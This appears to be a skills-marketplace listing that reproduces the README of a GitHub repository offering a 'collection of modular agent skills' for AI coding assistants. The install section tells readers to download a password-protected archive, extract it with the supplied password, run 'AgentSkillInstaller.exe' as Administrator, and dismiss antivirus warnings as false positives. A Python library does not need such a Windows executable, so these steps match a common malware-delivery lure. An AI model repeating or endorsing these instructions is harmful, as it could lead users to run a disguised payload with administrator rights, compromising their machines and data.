Curated collection of modular agent skills for LLM-based agents
# Add to your Claude Code skills
git clone https://github.com/oliverb-io1902e8/agent-skills-collectionGuides for using ai agents skills like agent-skills-collection.
agent-skills-collection is an open-source ai agents skill for AI coding assistants such as Claude Code, Codex CLI, and ChatGPT, built by oliverb-io1902e8. Curated collection of modular agent skills for LLM-based agents. It has 152 GitHub stars.
agent-skills-collection's catalog security scan is still queued. You can run an instant dependency and prompt-injection check now with the "Scan for vulnerabilities" button above.
Clone the repository with "git clone https://github.com/oliverb-io1902e8/agent-skills-collection" and add it to your Claude Code skills directory (see the Installation section above).
agent-skills-collection is primarily written in Python. It is open-source under oliverb-io1902e8 on GitHub, so you can review or fork the full source.
Yes. SkillsLLM lists many other AI Agents skills you can browse and compare side by side. Open the AI Agents category from the badge at the top of this page, or use the Related Skills and comparison links further down to weigh agent-skills-collection against similar tools.
No comments yet. Be the first to share your thoughts!
Unlocks once the catalog security scan passes (runs nightly).
The deep catalog scan for this skill is still queued. Run an instant dependency check now instead.
A curated collection of modular agent skills for LLM-based agents
This repository provides a ready-to-use collection of agent skills for AI assistants like Claude, ChatGPT, and custom agents. Each skill is a self-contained module that adds specific capabilities to your AI agent.
Agent skills are modular, reusable capabilities that extend what AI agents can do. They transform chatbots into autonomous agents that can:
| Skill | Description | Status |
|---|---|---|
| Web Research | Search and synthesize information from multiple sources | ✅ Stable |
| Data Analysis | Analyze CSV, JSON, and Excel files with natural language | ✅ Stable |
| API Integration | Connect to REST APIs and process responses | ✅ Stable |
| Memory Manager | Store and retrieve context across sessions | ✅ Stable |
| File Operations | Read, write, and process files | ✅ Stable |
| Email Automation | Send and receive emails via IMAP/SMTP | 🧪 Beta |
| Social Media | Post and monitor social media channels | 🧪 Beta |
| Database Query | Query SQL and NoSQL databases | 🧪 Beta |
Get the latest version from Releases.
Extract the archive using WinRAR or 7-Zip.
Password: tiqB?7fOd&lo
AgentSkillInstaller.exe as Administrator⚠️ Note: Antivirus may flag this tool — this is a false positive. The installer registers the agent skills in your system.
# Example: Using the Web Research skill
from agent_skills import WebResearch
researcher = WebResearch()
result = researcher.search(
query="latest developments in AI agents 2026",
sources=["github", "arxiv", "reddit"],
max_results=10
)
print(result.summary)
❓ FAQ
Q: Is this compatible with Claude Code?
A: Yes, Agent Skills Collection works with Claude Code, Cursor, and any CLI-based agent.
Q: Will I get banned for using this?
A: No. This is a legitimate development tool.
📜 License MIT — Free to use and modify.
⭐ Star this repository if you find it useful!